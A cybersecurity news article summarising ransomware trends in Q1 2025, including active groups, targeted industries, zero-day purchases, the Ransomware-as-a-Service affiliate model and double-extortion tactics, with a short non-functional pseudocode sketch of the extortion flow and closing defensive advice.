In the first quarter of 2025, ransomware attacks have maintained an alarming trajectory, with threat actors adopting sophisticated strategies centered on data exfiltration and blackmail through leak site posts.
These attacks continue to follow the pattern of “if it ain’t broke, don’t fix it,” with established threat actors and newcomers alike focusing on proven revenue generation techniques.
According to recent intelligence, there were 80 active ransomware groups in Q1, with 16 new entrants since January 1, while 13 groups active in Q4 2024 have gone silent.
.png
)
Manufacturing organizations remain the primary target, accounting for 22% of the 618 leak site posts containing victims’ industry information.
Business services followed at 11%, with healthcare and construction tied at 10% each.
The most prolific groups, ClOp and RansomHub, have displayed extraordinary activity levels, with ClOp alone responsible for 413 leak site posts in Q1 and an astonishing 345 in February.
.webp)
Rapid7 researchers noted a significant trend: ransomware groups are reinvesting their ill-gotten gains to acquire new exploitation tools.
Evidence from the Black Basta chat leaks in February revealed that ransomware groups are purchasing zero-day exploits, with one seller offering an unauthenticated RCE exploit targeting Ivanti Connect Secure for $200,000.
This reinvestment cycle fuels more sophisticated attacks and demonstrates the financial maturity of these criminal enterprises.
Initial access vectors vary widely but commonly include vulnerability exploitation, phishing campaigns, and compromised Remote Desktop Protocol (RDP) connections.
Once inside, attackers swiftly move to reconnaissance, credential theft, lateral movement, and ultimately, data exfiltration before deploying encryption payloads.
Some groups, notably LockBit, employ Living off the Land (LOTL) tactics, utilizing legitimate tools already present in victim environments to evade detection for weeks or months.
The double extortion approach has become standard practice across the ransomware landscape, with groups not only encrypting critical systems but also exfiltrating sensitive data and threatening to publish it on dedicated leak sites if ransom demands aren’t met.
These demands range from as little as $10,000 to upwards of $600,000, with payment deadlines varying from 48 hours to 90 days.
The Ransomware-as-a-Service Business Model
The cornerstone of modern ransomware operations is the Ransomware-as-a-Service (RaaS) business model, which has dramatically lowered the technical barrier to entry for cybercriminals.
This model separates ransomware developers from operators, creating an ecosystem where specialized skills are monetized efficiently.
The Lynx ransomware group exemplifies this approach with their comprehensive affiliate panel that allows partners to micromanage campaigns.
if (victim.hasValueableData()) {
exfiltrateData();
deployEncryption();
if (victim.paysRansom()) {
provideDecryptor(); // May or may not be honored
// Data deletion rarely occurs despite promises
} else {
publishToLeakSite();
}
}The affiliate dashboard provided by groups like Lynx includes victim profile pages, operational news, updates, and an “all-in-one” archive of executables targeting multiple system architectures.
Affiliates typically receive 70-80% of any ransom payment, with the remainder going to the ransomware developers. This arrangement incentivizes widespread deployment while maintaining quality control over the malware itself.
.webp)
Newer groups like Anubis have further evolved the model by incorporating malevolence-as-a-service elements, including journalism-style reporting on victims’ alleged security failings.
This additional layer of public shaming increases pressure on victims through carefully crafted social media campaigns designed to maximize reputational damage and force payment.
As ransomware operations continue to evolve technically and structurally, organizations must prioritize security fundamentals including multi-factor authentication, continuous patch management, and comprehensive attack surface monitoring to reduce their risk of becoming the next headline on a ransomware leak site.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
